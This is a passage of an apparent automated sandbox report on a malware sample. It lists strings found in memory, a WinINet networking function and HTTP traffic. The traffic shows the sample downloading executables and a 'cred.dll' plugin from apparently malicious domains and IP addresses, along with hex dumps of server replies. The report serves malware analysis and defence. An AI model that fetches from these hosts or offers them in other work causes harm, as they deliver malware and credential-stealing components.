                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                          Source: svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srf.srf
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srfwork
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/retention.srf
                          Source: svchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                          Source: svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf256
                          Source: svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                          Source: A7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: A7F0.exe, 0000001F.00000002.663878088.0000000005215000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: https://t.me/capibar
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                          Source: A7F0.exe, 0000001F.00000002.650359326.0000000002F2A000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0)
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
                          Source: A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 19 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 09:42:29 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 